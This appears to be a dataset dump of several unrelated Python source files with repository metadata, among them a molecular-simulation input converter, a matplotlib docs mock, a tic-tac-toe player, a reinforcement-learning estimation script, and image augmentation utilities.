#Collect bond distances from TRAPPE params.
#Strip quotation marks and convert to int.
TRAP_bond_dist_list = []
TRAP_bond_atms = []
TRAP_bond_hybrids = []
TRAP_bond_charges = []
for i,bond in enumerate(TRAP_bonds):
TRAP_bond_dist = float(bond[-1])
TRAP_bond_dist_list.append(TRAP_bond_dist)
TRAP_bond_desc = bond[1].split('-')
TRAP_bond_atms.append(TRAP_bond_desc)
TRAP_bond_hybrids.append([])
TRAP_bond_charges.append([])
#Clean TRAPPE psuedo atom params
for i,bond2 in enumerate(TRAP_bond_atms):
#Clean atom indices wihtin bond type.
for j,el in enumerate(bond2):
TRAP_bond_atms[i][j] = el.strip('\'\"')
#Collect hybridization of psuedoatoms corresponding to bond.
for k,line in enumerate(TRAP_atms):
if TRAP_bond_atms[i][j].strip() == line[0]:
TRAP_bond_hybrids[i].append(line[1])
TRAP_bond_charges[i].append(line[-1])
skip_ASE_indices = []
skip_TRAPPE_indices = []
ASE_new_positions = []
#Match TRAPPE bonds/indices w/ ASE bonds/indices.
for i, dist in enumerate(TRAP_bond_dist_list):
#Find index and value of ASE bond length which is closest to TRAPPE bond length.
ASE_bond_dist_list_tmp = ASE_bond_dist_list.copy()
indx, value = find_nearest(ASE_bond_dist_list,dist)
#Ensure hybrids in ASE bond match TRAPPE bond.
timeout_loop = time.time() + 60
while not set(TRAP_bond_hybrids[i]) == set(ASE_bond_hybrids[indx]):
ASE_bond_dist_list_tmp[indx] = 0
indx, value = find_nearest(ASE_bond_dist_list_tmp,dist)
if time.time() > timeout_loop:
sys.exit('Error: ASE Hybrids could not be matched with TRAPPE Hybrids. Check SMILES structure &/or adjust Hydrogen bond criterion.')
#Change ASE index to TRAPPE index by matching psuedoatom hybridization.
for j,TRAPE_hybrid in enumerate(TRAP_bond_hybrids[i]):
#print(TRAP_bond_atms[i][j])
for k, ASE_hybrid in enumerate(ASE_bond_hybrids[indx]):
#Ensure that closest bond distance assumption is valid.
if TRAPE_hybrid not in ASE_bond_hybrids[indx]:
sys.exit('Error: Hybrid not found in ASE bond. Check distances.')
elif TRAPE_hybrid == ASE_hybrid:
#Collect corresponding ASE info.
#print(ASE_bond_atms[indx],ASE_bond_dist_list[indx],ASE_bond_hybrids[indx])
#Collect corresponding TRAPPE info.
#print(TRAP_bond_atms[i],TRAP_bond_dist_list[i],TRAP_bond_hybrids[i])
#print(TRAP_bond_atms[i][j])
for z,atm in enumerate(ASE_atms):
if atm.index == int(ASE_bond_atms[indx][k]) and atm.index not in skip_ASE_indices and int(TRAP_bond_atms[i][j]) not in skip_TRAPPE_indices:
ASE_new_positions.append([int(TRAP_bond_atms[i][j]),atm.mass,TRAP_bond_charges[i][j],atm.position])
skip_ASE_indices.append(atm.index)
skip_TRAPPE_indices.append(int(TRAP_bond_atms[i][j]))
ASE_bond_dist_list[indx] = False
ASE_bond_atms[indx] = False
ASE_bond_hybrids[indx] = False
return ASE_new_positions
'''
Main Program Begins Here
'''
#TRAPPE
#Collect TRAPPE input params
TRAPPE_fname = 'trappe_parameters_3.txt'
TRAPPE_atoms, TRAPPE_bonds, TRAPPE_name = get_TRAPPE_params(TRAPPE_fname)
#ASE
#Convert Smiles string into Atoms object.
SMILES = 'CCC'
atoms = pubchem_atoms_search(smiles=SMILES)
#Determine psuedo-atoms of molecule and remove hydrogens.
psuedo_atoms = get_psuedoatoms(atoms,TRAPPE_atoms,TRAPPE_bonds)
ana = Analysis(psuedo_atoms) #Create geometry analysis object from Atoms object.
organized_ASE_atoms = Order_atoms_wrt_TRAPPE(psuedo_atoms,ana,TRAPPE_bonds,TRAPPE_atoms)
#Center the psuedo_atoms. FEASST requires atom[0] to be located within origin!
for atm in organized_ASE_atoms:
if atm[0] == 1:
center_about = np.copy(atm[-1])
break
for atm in organized_ASE_atoms:
atm[-1] -= center_about
'''
File Output
'''
f = open('FEASST_'+TRAPPE_fname.split('_')[-1].split('.')[0]+'.in',"w")
#Heading
f.write('# FEASST data file \n# %s \n# %s \n# %s \n' % (TRAPPE_name[0],TRAPPE_fname,SMILES))
#Preface
f.write('\n%s atoms \n%s bonds \n\n%s atom types \n%s bond types \n' %
(len(TRAPPE_atoms[:,0]),len(TRAPPE_bonds[:,0]),
len(TRAPPE_atoms[:,1]),len(TRAPPE_bonds[:,2])))
f.write('\n%s %s xlo xhi \n%s %s ylo yhi \n%s %s zlo zhi \n' %
(np.amin(psuedo_atoms.positions[:,0]),np.amax(psuedo_atoms.positions[:,0]),
np.amin(psuedo_atoms.positions[:,1]),np.amax(psuedo_atoms.positions[:,1]),
np.amin(psuedo_atoms.positions[:,2]),np.amax(psuedo_atoms.positions[:,2])))
#Masses
f.write('\nMasses\n\n')
for i,atm in enumerate(organized_ASE_atoms):
f.write('%s %s \n' % (atm[0],atm[1]))
#Pair Coeffs
f.write('\nPair Coeffs\n\n')
for i,line in enumerate(TRAPPE_atoms):
f.write('%s %s %s \n' % (TRAPPE_atoms[i,0],float(TRAPPE_atoms[i,3])*kB[0]*NA[0]/1000,TRAPPE_atoms[i,4]))
#Bond Coeffs
f.write('\nBond Coeffs\n\n')
for i,line in enumerate(TRAPPE_bonds):
f.write('%s -1 %s \n' % (TRAPPE_bonds[i,0],TRAPPE_bonds[i,-1]))
#Atoms
f.write('\nAtoms\n\n')
for i,atm in enumerate(organized_ASE_atoms):
f.write('%s %s %s %s %s %s %s 0 0 0\n' % (atm[0],1,atm[0],atm[2],atm[3][0],atm[3][1],atm[3][2]))
#Bonds
f.write('\nBonds\n\n')
for i,bond in enumerate(TRAPPE_bonds):
f.write('%s %s %s %s\n' % (bond[0],bond[0],bond[1].strip('"\'').split('-')[0].strip(),bond[1].strip('"\'').split('-')[1].strip()))
f.close() | [
"chr218@sol.cc.lehigh.edu"
] | chr218@sol.cc.lehigh.edu |
d3f0507bedcb7480314209d9473afa6749e406ff | e1f8bb28b022720445debea589c9cf091103a303 | /doc/sphinxext/mock_gui_toolkits.py | 097a3409b16793df0a2333fa9b2e06ab2289e15a | [] | no_license | demotu/matplotlib | e5a4e6c7047373b3ead918c40c97f93eb09c562d | 1662e05278ecaea064b9149c4fcb15df9f337862 | refs/heads/master | 2021-01-22T00:06:39.310427 | 2018-06-12T20:38:12 | 2018-06-12T20:38:12 | 24,751,842 | 1 | 0 | null | 2018-06-12T20:38:13 | 2014-10-03T08:38:36 | Python | UTF-8 | Python | false | false | 6,886 | py | import sys
from unittest.mock import MagicMock
class MyCairoCffi(MagicMock):
pass
class MyPyQt4(MagicMock):
class QtGui(object):
# PyQt4.QtGui public classes.
# Generated with
# textwrap.fill([name for name in dir(PyQt4.QtGui)
# if isinstance(getattr(PyQt4.QtGui, name), type)])
_QtGui_public_classes = """\
Display QAbstractButton QAbstractGraphicsShapeItem
QAbstractItemDelegate QAbstractItemView QAbstractPrintDialog
QAbstractProxyModel QAbstractScrollArea QAbstractSlider
QAbstractSpinBox QAbstractTextDocumentLayout QAction QActionEvent
QActionGroup QApplication QBitmap QBoxLayout QBrush QButtonGroup
QCalendarWidget QCheckBox QClipboard QCloseEvent QColor QColorDialog
QColumnView QComboBox QCommandLinkButton QCommonStyle QCompleter
QConicalGradient QContextMenuEvent QCursor QDataWidgetMapper QDateEdit
QDateTimeEdit QDesktopServices QDesktopWidget QDial QDialog
QDialogButtonBox QDirModel QDockWidget QDoubleSpinBox QDoubleValidator
QDrag QDragEnterEvent QDragLeaveEvent QDragMoveEvent QDropEvent
QErrorMessage QFileDialog QFileIconProvider QFileOpenEvent
QFileSystemModel QFocusEvent QFocusFrame QFont QFontComboBox
QFontDatabase QFontDialog QFontInfo QFontMetrics QFontMetricsF
QFormLayout QFrame QGesture QGestureEvent QGestureRecognizer QGlyphRun
QGradient QGraphicsAnchor QGraphicsAnchorLayout QGraphicsBlurEffect
QGraphicsColorizeEffect QGraphicsDropShadowEffect QGraphicsEffect
QGraphicsEllipseItem QGraphicsGridLayout QGraphicsItem
QGraphicsItemAnimation QGraphicsItemGroup QGraphicsLayout
QGraphicsLayoutItem QGraphicsLineItem QGraphicsLinearLayout
QGraphicsObject QGraphicsOpacityEffect QGraphicsPathItem
QGraphicsPixmapItem QGraphicsPolygonItem QGraphicsProxyWidget
QGraphicsRectItem QGraphicsRotation QGraphicsScale QGraphicsScene
QGraphicsSceneContextMenuEvent QGraphicsSceneDragDropEvent
QGraphicsSceneEvent QGraphicsSceneHelpEvent QGraphicsSceneHoverEvent
QGraphicsSceneMouseEvent QGraphicsSceneMoveEvent
QGraphicsSceneResizeEvent QGraphicsSceneWheelEvent
QGraphicsSimpleTextItem QGraphicsTextItem QGraphicsTransform
QGraphicsView QGraphicsWidget QGridLayout QGroupBox QHBoxLayout
QHeaderView QHelpEvent QHideEvent QHoverEvent QIcon QIconDragEvent
QIconEngine QIconEngineV2 QIdentityProxyModel QImage QImageIOHandler
QImageReader QImageWriter QInputContext QInputContextFactory
QInputDialog QInputEvent QInputMethodEvent QIntValidator QItemDelegate
QItemEditorCreatorBase QItemEditorFactory QItemSelection
QItemSelectionModel QItemSelectionRange QKeyEvent QKeyEventTransition
QKeySequence QLCDNumber QLabel QLayout QLayoutItem QLineEdit
QLinearGradient QListView QListWidget QListWidgetItem QMainWindow
QMatrix QMatrix2x2 QMatrix2x3 QMatrix2x4 QMatrix3x2 QMatrix3x3
QMatrix3x4 QMatrix4x2 QMatrix4x3 QMatrix4x4 QMdiArea QMdiSubWindow
QMenu QMenuBar QMessageBox QMimeSource QMouseEvent
QMouseEventTransition QMoveEvent QMovie QPageSetupDialog QPaintDevice
QPaintEngine QPaintEngineState QPaintEvent QPainter QPainterPath
QPainterPathStroker QPalette QPanGesture QPen QPicture QPictureIO
QPinchGesture QPixmap QPixmapCache QPlainTextDocumentLayout
QPlainTextEdit QPolygon QPolygonF QPrintDialog QPrintEngine
QPrintPreviewDialog QPrintPreviewWidget QPrinter QPrinterInfo
QProgressBar QProgressDialog QProxyModel QPushButton QPyTextObject
QQuaternion QRadialGradient QRadioButton QRawFont QRegExpValidator
QRegion QResizeEvent QRubberBand QScrollArea QScrollBar
QSessionManager QShortcut QShortcutEvent QShowEvent QSizeGrip
QSizePolicy QSlider QSortFilterProxyModel QSound QSpacerItem QSpinBox
QSplashScreen QSplitter QSplitterHandle QStackedLayout QStackedWidget
QStandardItem QStandardItemModel QStaticText QStatusBar
QStatusTipEvent QStringListModel QStyle QStyleFactory QStyleHintReturn
QStyleHintReturnMask QStyleHintReturnVariant QStyleOption
QStyleOptionButton QStyleOptionComboBox QStyleOptionComplex
QStyleOptionDockWidget QStyleOptionDockWidgetV2 QStyleOptionFocusRect
QStyleOptionFrame QStyleOptionFrameV2 QStyleOptionFrameV3
QStyleOptionGraphicsItem QStyleOptionGroupBox QStyleOptionHeader
QStyleOptionMenuItem QStyleOptionProgressBar QStyleOptionProgressBarV2
QStyleOptionRubberBand QStyleOptionSizeGrip QStyleOptionSlider
QStyleOptionSpinBox QStyleOptionTab QStyleOptionTabBarBase
QStyleOptionTabBarBaseV2 QStyleOptionTabV2 QStyleOptionTabV3
QStyleOptionTabWidgetFrame QStyleOptionTabWidgetFrameV2
QStyleOptionTitleBar QStyleOptionToolBar QStyleOptionToolBox
QStyleOptionToolBoxV2 QStyleOptionToolButton QStyleOptionViewItem
QStyleOptionViewItemV2 QStyleOptionViewItemV3 QStyleOptionViewItemV4
QStylePainter QStyledItemDelegate QSwipeGesture QSyntaxHighlighter
QSystemTrayIcon QTabBar QTabWidget QTableView QTableWidget
QTableWidgetItem QTableWidgetSelectionRange QTabletEvent
QTapAndHoldGesture QTapGesture QTextBlock QTextBlockFormat
QTextBlockGroup QTextBlockUserData QTextBrowser QTextCharFormat
QTextCursor QTextDocument QTextDocumentFragment QTextDocumentWriter
QTextEdit QTextFormat QTextFragment QTextFrame QTextFrameFormat
QTextImageFormat QTextInlineObject QTextItem QTextLayout QTextLength
QTextLine QTextList QTextListFormat QTextObject QTextObjectInterface
QTextOption QTextTable QTextTableCell QTextTableCellFormat
QTextTableFormat QTimeEdit QToolBar QToolBox QToolButton QToolTip
QTouchEvent QTransform QTreeView QTreeWidget QTreeWidgetItem
QTreeWidgetItemIterator QUndoCommand QUndoGroup QUndoStack QUndoView
QVBoxLayout QValidator QVector2D QVector3D QVector4D QWhatsThis
QWhatsThisClickedEvent QWheelEvent QWidget QWidgetAction QWidgetItem
QWindowStateChangeEvent QWizard QWizardPage QWorkspace
QX11EmbedContainer QX11EmbedWidget QX11Info
"""
for _name in _QtGui_public_classes.split():
locals()[_name] = type(_name, (), {})
del _name
class MySip(MagicMock):
def getapi(*args):
return 1
class MyWX(MagicMock):
class Panel(object):
pass
class ToolBar(object):
pass
class Frame(object):
pass
def setup(app):
sys.modules.update(
cairocffi=MyCairoCffi(),
PyQt4=MyPyQt4(),
sip=MySip(),
wx=MyWX(),
)
return {'parallel_read_safe': True, 'parallel_write_safe': True}
| [
"anntzer.lee@gmail.com"
] | anntzer.lee@gmail.com |
1633bb7068e1cd41998909fb9a5009c900e1c856 | 9bd7cb46c2628003d200e1865740f50f7ebdd538 | /BuildWord.py | 02d30f40613eeabcbf0fe41cd0f1a2bfc3a021f9 | [] | no_license | ScoobyLuffyDoo/Hang-Man-Python | 7c96861d552c116b1fc52cb30cff1469babe26fc | 06491ccccb5226919c0d0a166ad2b3da5ef2b7c1 | refs/heads/master | 2023-07-27T01:00:41.002870 | 2021-09-06T12:37:22 | 2021-09-06T12:37:22 | 318,529,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | import requests
import random
import json
# Retrives a random word form random word generator
def get_randomWord():
url = "https://randomwordgenerator.com/json/words_ws.json"
response = requests.request("GET",url)
return_results = response.json()
randomNumber= random.randint(1,3256)
randomWord = return_results['data'][randomNumber]["word"]["value"]
return randomWord | [
"jc.smal626@gmail.com"
] | jc.smal626@gmail.com |
51a5de5a76db69817407b3251044c8d8f122a59f | 264f392530710b287ac54f40ea805638c6348cc3 | /scripts/run_tabular_bayes_dice.py | 3326a3f91fd93e0b96222614b928658af9ee75ab | [
"Apache-2.0"
] | permissive | google-research/dice_rl | b26dd2231b0a664f11e0ede08d8209a4ace1cd2f | 6551950608ad0472ddf6e8f4075f51793c9d2763 | refs/heads/master | 2023-08-06T21:35:15.690175 | 2023-01-30T19:26:12 | 2023-01-30T19:27:38 | 285,369,787 | 106 | 14 | Apache-2.0 | 2023-01-30T19:27:44 | 2020-08-05T18:15:53 | Python | UTF-8 | Python | false | false | 6,480 | py | # Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script for running tabular BayesDICE.
Make sure to generate the datasets prior to running this script (see
`scripts/create_dataset.py`). The default parameters here should reproduce
the published bandit and frozenlake results. For Taxi, pass in
solve_for_state_action_ratio=False.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import numpy as np
import os
import tensorflow.compat.v2 as tf
tf.compat.v1.enable_v2_behavior()
import tensorflow_probability as tfp
import pickle
from tf_agents.environments import gym_wrapper
from tf_agents.environments import tf_py_environment
from dice_rl.environments.env_policies import get_target_policy
import dice_rl.environments.gridworld.navigation as navigation
import dice_rl.environments.gridworld.taxi as taxi
from dice_rl.estimators import estimator as estimator_lib
from dice_rl.estimators.tabular_bayes_dice import TabularBayesDice
import dice_rl.utils.common as common_utils
from dice_rl.data.dataset import Dataset, EnvStep, StepType
from dice_rl.data.tf_offpolicy_dataset import TFOffpolicyDataset
FLAGS = flags.FLAGS
flags.DEFINE_string('env_name', 'frozenlake', 'Environment name.')
flags.DEFINE_integer('seed', 0, 'Initial random seed.')
flags.DEFINE_integer('num_trajectory', 5, 'Number of trajectories to collect.')
flags.DEFINE_float('alpha', 0.0,
'How close is the behavior policy to optimal policy.')
flags.DEFINE_integer('max_trajectory_length', 100,
'Cutoff trajectory at this step.')
flags.DEFINE_bool('tabular_obs', True, 'Whether to use tabular observations.')
flags.DEFINE_string('load_dir', None, 'Directory to load dataset from.')
flags.DEFINE_string('save_dir', None, 'Directory to save estimation results.')
flags.DEFINE_float('gamma', 0.99, 'Discount factor.')
flags.DEFINE_integer('num_steps', 50000, 'Number of training steps.')
flags.DEFINE_integer('batch_size', 1024, 'Batch size.')
flags.DEFINE_float('zeta_learning_rate', 1e-2, 'Zeta learning rate.')
flags.DEFINE_float('nu_learning_rate', 1e-2, 'Value learning rate.')
flags.DEFINE_bool('solve_for_state_action_ratio', True,
'Whether to use tabular observations.')
flags.DEFINE_float('alpha_target', 1.0,
'How close is the target policy to optimal policy.')
flags.DEFINE_float('kl_regularizer', 1., 'LP regularizer of kl(q||p).')
flags.DEFINE_float('eps_std', 1., 'Epsilon std for reparametrization.')
def main(argv):
env_name = FLAGS.env_name
seed = FLAGS.seed
tabular_obs = FLAGS.tabular_obs
num_trajectory = FLAGS.num_trajectory
max_trajectory_length = FLAGS.max_trajectory_length
load_dir = FLAGS.load_dir
save_dir = FLAGS.save_dir
gamma = FLAGS.gamma
assert 0 <= gamma < 1.
alpha = FLAGS.alpha
alpha_target = FLAGS.alpha_target
num_steps = FLAGS.num_steps
batch_size = FLAGS.batch_size
zeta_learning_rate = FLAGS.zeta_learning_rate
nu_learning_rate = FLAGS.nu_learning_rate
solve_for_state_action_ratio = FLAGS.solve_for_state_action_ratio
eps_std = FLAGS.eps_std
kl_regularizer = FLAGS.kl_regularizer
target_policy = get_target_policy(
load_dir, env_name, tabular_obs, alpha=alpha_target)
hparam_str = ('{ENV_NAME}_tabular{TAB}_alpha{ALPHA}_seed{SEED}_'
'numtraj{NUM_TRAJ}_maxtraj{MAX_TRAJ}').format(
ENV_NAME=env_name,
TAB=tabular_obs,
ALPHA=alpha,
SEED=seed,
NUM_TRAJ=num_trajectory,
MAX_TRAJ=max_trajectory_length)
directory = os.path.join(load_dir, hparam_str)
print('Loading dataset.')
dataset = Dataset.load(directory)
print('num loaded steps', dataset.num_steps)
print('num loaded total steps', dataset.num_total_steps)
print('num loaded episodes', dataset.num_episodes)
print('num loaded total episodes', dataset.num_total_episodes)
print('behavior per-step',
estimator_lib.get_fullbatch_average(dataset, gamma=gamma))
train_hparam_str = ('eps{EPS}_kl{KL}').format(EPS=eps_std, KL=kl_regularizer)
if save_dir is not None:
# Save for a specific alpha target
target_hparam_str = hparam_str.replace(
'alpha{}'.format(alpha), 'alpha{}_alphat{}'.format(alpha, alpha_target))
save_dir = os.path.join(save_dir, target_hparam_str, train_hparam_str)
summary_writer = tf.summary.create_file_writer(logdir=save_dir)
else:
summary_writer = tf.summary.create_noop_writer()
estimator = TabularBayesDice(
dataset_spec=dataset.spec,
gamma=gamma,
solve_for_state_action_ratio=solve_for_state_action_ratio,
zeta_learning_rate=zeta_learning_rate,
nu_learning_rate=nu_learning_rate,
kl_regularizer=kl_regularizer,
eps_std=eps_std,
)
estimator.prepare_dataset(dataset, target_policy)
global_step = tf.Variable(0, dtype=tf.int64)
tf.summary.experimental.set_step(global_step)
with summary_writer.as_default():
running_losses = []
running_estimates = []
for step in range(num_steps):
loss = estimator.train_step()[0]
running_losses.append(loss)
global_step.assign_add(1)
if step % 500 == 0 or step == num_steps - 1:
print('step', step, 'losses', np.mean(running_losses, 0))
estimate = estimator.estimate_average_reward(dataset, target_policy)
tf.debugging.check_numerics(estimate, 'NaN in estimate')
running_estimates.append(estimate)
tf.print('est', tf.math.reduce_mean(estimate),
tf.math.reduce_std(estimate))
running_losses = []
if save_dir is not None:
with tf.io.gfile.GFile(os.path.join(save_dir, 'results.npy'), 'w') as f:
np.save(f, running_estimates)
print('saved results to %s' % save_dir)
print('Done!')
if __name__ == '__main__':
app.run(main)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
ceabc15d9478f8383faa3bce689875d157882138 | 56d3afdc5307ddaad2281d75ebeecf6ad499cf3a | /tic_tac_toe.py | 501e6ec6e4b1685fea2de71408f0de0c2d10405e | [] | no_license | ianbrayoni/tictactoe | 5cb64ee19b48cb7c901ae86accdc84ca527311ce | ed2563db15d7b791b7f0c32e87d1751a26030445 | refs/heads/master | 2022-12-10T07:51:59.910314 | 2020-01-28T18:25:17 | 2020-01-28T18:25:17 | 161,775,273 | 3 | 0 | null | 2022-12-08T03:30:57 | 2018-12-14T11:25:04 | Python | UTF-8 | Python | false | false | 6,972 | py | import random
X = "x"
O = "o"
EMPTY = " "
NUM_BOARD_POSITIONS = 9
WINNING_POSITIONS = (
(1, 2, 3),
(4, 5, 6),
(7, 8, 9),
(1, 4, 7),
(2, 5, 8),
(3, 6, 9),
(3, 5, 7),
(1, 5, 9),
)
def create_board(str_board):
"""
Convert string representation of the tictactoe board into a list
List will have one extra item at the beginning so that board/grid
positions can be referenced from 1 - refer to move_handler()
>> create_board(" xxo o x")
[' ', ' ', 'x', 'x', 'o', ' ', ' ', 'o', ' ', 'x']
:param str_board: str (string representation of the tictactoe board)
:returns: list
"""
board = [" "] + list(str_board)
return board
def winning_move(board):
"""
Check for possible winning moves
:param board: list representation of the tictactoe game
:returns: True or False
"""
for row in WINNING_POSITIONS:
if board[row[0]] == board[row[1]] == board[row[2]] != EMPTY:
return True
return False
def move_handler(board):
"""
Determine which move to make from list of available moves
Uses the following stategy:
1. If any corner slots are available, make a move into one of them
2. If no corner slot is available but center is free, take center spot
3. Move into an edge iff corners and center not available
>> move_handler([' ', ' ', 'x', 'x', 'o', ' ', ' ', 'o', ' ', ' '])
1
:param board: list representaion of the tictactoe board
:returns: int - the index to make a move to
"""
if win(board):
return win(board)
elif block_x_win(board):
return block_x_win(board)
else:
available_moves = [
idx for idx, letter in enumerate(board) if letter == EMPTY and idx != 0
]
# if board elements read from 0, this condition fails - if 0: False
# yet 0 is a valid position in a 0-indexed list
if play_corners(available_moves):
return play_corners(available_moves)
if play_center(available_moves):
return play_center(available_moves)
if play_edges(available_moves):
return play_edges(available_moves)
def win(board):
"""
Make a winning move for O if its obvious to do so
:param board: list representaion of the tictactoe board
:returns: int - the index to make a move to
"""
return check_for_possible_win(board, O)
def block_x_win(board):
"""
Block X's move if no winning move available for O
:param board: list representaion of the tictactoe board
:returns: int - the index to make a move to
"""
return check_for_possible_win(board, X)
def check_for_possible_win(board, letter):
"""
Given a letter, check whether it occurs one after the other e.g
['x', 'x', ' ']
:param board: list representaion of the tictactoe board
:param letter: str to check for
:returns: int - the index to make a move to
"""
for row in WINNING_POSITIONS:
if letter == board[row[0]] == board[row[1]]:
move = row[2]
break
elif letter == board[row[0]] == board[row[2]]:
move = row[1]
break
elif letter == board[row[1]] == board[row[2]]:
move = row[0]
break
return move
def play_corners(possible_moves):
"""
Check if there is a possible move in list of corner indices [1, 3, 7, 9]
If any corner slots are available, make a move into one of them
>> play_corners([1, 4, 7, 8])
1 (or 7)
:param possible_moves: list - empty slots on the board
:returns: int - randomly selected position to be occupied
"""
corners = [1, 3, 7, 9]
available_corners = []
for idx in possible_moves:
if idx in corners:
available_corners.append(idx)
if len(available_corners) > 0:
return select_any(available_corners)
def play_edges(possible_moves):
"""
Check if there is a possible move in list of edge indices [2, 4, 6, 8]
If any edge slots are available, make a move into one of them
>> play_edges([1, 2, 5])
2
:param possible_moves: list - empty slots on the board
:returns: int - randomly selected position to be occupied
"""
edges = [2, 4, 6, 8]
available_edges = []
for idx in possible_moves:
if idx in edges:
available_edges.append(idx)
if len(available_edges) > 0:
return select_any(available_edges)
def play_center(possible_moves):
"""
Check if there is a possible move corresponding to center index - 4
If center slot is available, make a move into it
>> play_center([5, 8])
5
:param possible_moves: list - empty slots on the board
:returns: int - center spot
"""
if 5 in possible_moves:
return 5
def select_any(lst):
"""
Return random value from list
>>select_any([1, 3, 5])
1 (or 3 or 5)
:param lst: list - available edges/corners
:returns: int - where to move to
"""
r = random.randrange(0, len(lst))
return lst[r]
def play(board):
"""
Given a move, update the board and return a string representation
of the board
>> play([' ', ' ', 'x', 'x', 'o', ' ', ' ', 'o', ' ', ' '])
' xxo o o'
:param board: list representation of the tictactoe board
:returns: str - string representation of the tictactoe board
"""
pos = move_handler(board)
if pos:
board[pos] = O
# return string of 9 elements, rem our array has 10 elements
return "".join(board[1:])
def is_safe_to_play(str_board):
"""
A couple of checks ascertaining whether its safe to play
Checks are done against the string representation of the tictactoe board
1. Expected characters are: ' ' or 'x' or 'o'
2. String has to be of nine characters, no more no less
3. If there's already a winner, no point to play
4. Players take turns to play, one can only be one move ahead
5. Board should not be full
>> is_safe_to_play(" xxo o x")
True
:param str_board: str - string representation of the tictactoe board
:returns: Boolean - True if safe to play, otherwise False
"""
if not set(str_board).issubset({X, O, EMPTY}):
return False
if len(str_board) != NUM_BOARD_POSITIONS:
return False
board = create_board(str_board)
if winning_move(board):
return False
x_count = (board[1:]).count(X)
o_count = (board[1:]).count(O)
if (x_count - o_count > 1) or (o_count - x_count > 1):
return False
if (board[1:]).count(EMPTY) == 0:
return False
return True
def main():
board_state = input("Enter the board state: ")
if is_safe_to_play(board_state):
board = create_board(board_state)
return play(board)
else:
return "Invalid board state!"
if __name__ == "__main__":
main()
| [
"ian.baraza@jumo.world"
] | ian.baraza@jumo.world |
27a2b8233ca588d5ce1b4954241ac87f2ee31b23 | 99e44f844d78de330391f2b17bbf2e293bf24b1b | /pytorch/tools/autograd/nested_dict.py | e1e09814199153aa94647c2246c983b2ba3ea303 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | raghavnauhria/whatmt | be10d57bcd6134dd5714d0c4058abd56a1b35a13 | c20483a437c82936cb0fb8080925e37b9c4bba87 | refs/heads/master | 2022-12-04T05:39:24.601698 | 2019-07-22T09:43:30 | 2019-07-22T09:43:30 | 193,026,689 | 0 | 1 | MIT | 2022-11-28T17:50:19 | 2019-06-21T03:48:20 | C++ | UTF-8 | Python | false | false | 581 | py | # TODO: refactor nested_dict into common library with ATen
class nested_dict(object):
"""
A nested dict is a dictionary with a parent. If key lookup fails,
it recursively continues into the parent. Writes always happen to
the top level dict.
"""
def __init__(self, base, parent):
self.base, self.parent = base, parent
def __contains__(self, item):
return item in self.base or item in self.parent
def __getitem__(self, x):
r = self.base.get(x)
if r is not None:
return r
return self.parent[x]
| [
"rnauhria@gmail.com"
] | rnauhria@gmail.com |
21b9c22f7f7d443ed421bf0db7af633c519aeda9 | 3849a67138f907e9336a2bfceda43057cb28e916 | /utilities/manual_augmentation.py | d06b3640c64897a6712c6f77502e0fe7bf17448d | [] | no_license | wallacelibrary/OCR-Handwriting | ccb47bdc8f58e5f4514fb47831e76a5404d9c2e7 | a02b9982c9db7fa3c193dec07d808762da4e1b74 | refs/heads/master | 2022-05-08T13:02:44.403883 | 2019-08-16T18:37:55 | 2019-08-16T18:37:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 16 09:55:22 2019
@author: matth
"""
root_dir = r'C:\Users\matth\Documents\GitHub\OCR-Handwriting\bin\src\testing\convnet-smallset-ocr-test3\testing-data\original-sets'
from scipy import ndarray
import random
import skimage as sk
from skimage import transform
from skimage import util
import os
sub_folders = [os.path.join(root_dir,folder) for folder in os.listdir(root_dir)]
num_files_desired = 250
def random_rotation(image_array: ndarray):
rand_degree = random.uniform(-25, 25)
return sk.transform.rotate(image_array, rand_degree)
def random_noise(image_array: ndarray):
return sk.util.random_noise(image_array)
def horizontal_flip(image_array: ndarray):
return image_array[:, ::-1]
avail_transforms = {
'rotate' : random_rotation,
'noise' : random_noise,
'horizontal_flip' : horizontal_flip
}
for folder in sub_folders:
images = [os.path.join(folder, pic) for pic in os.listdir(folder)]
generated = 0
while generated <= num_files_desired:
transformed = None
image = random.choice(images)
imgarray = sk.io.imread(image)
num_transforms = 0
t = random.randint(1, len(avail_transforms))
while num_transforms <= t:
key = random.choice(list(avail_transforms))
imgarray = avail_transforms[key](imgarray)
num_transforms+=1
generated+=1
name = 'augmented_' + str(generated) + '.png'
newfile= os.path.join(folder, name)
sk.io.imsave(newfile, imgarray)
print('Generated ', generated, ' images for ', folder)
| [
"32942111+mattlm0831@users.noreply.github.com"
] | 32942111+mattlm0831@users.noreply.github.com |
99286b2ac35687ea7459db1976eefff58c6ac283 | 3a3c7ab7d9cadfc5610888e07dbb9d6eaaf8aa01 | /scripts/OpenFOAM/generateBodyOBJFile.py | b2dfdaab64702e895cf9fb115ccd64fdb7f598dc | [
"MIT"
] | permissive | cubayang/snake | 7e430e8bcbf4acf99c007e5c1a646e0e6f45280c | f78844235f4d9b815b53a707f276dd634bce7a07 | refs/heads/master | 2021-01-17T20:24:27.359901 | 2016-08-18T00:34:18 | 2016-08-18T00:34:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,641 | py | # file: generateBodyOBJFile.py
# author: Olivier Mesnard (mesnardo@gwu.edu)
# brief: Convert input coordinates file into a OBJ file.
import os
import argparse
from snake.openfoam import OBJFile
from snake import miscellaneous
def parse_command_line():
"""Parses the command-line."""
print('[info] parsing command-line ...'),
# create the parser
parser = argparse.ArgumentParser(description='Generates an .OBJ file '
'that will be readable by OpenFOAM '
'mesh generator: SnappyHexMesh',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser = argparse.ArgumentParser(description='Generates an .OBJ file '
# 'that will be readable by OpenFOAM '
# 'mesh generator: SnappyHexMesh')
# fill the parser with arguments
parser.add_argument('--file', dest='file_path',
type=str,
metavar=('<path>'),
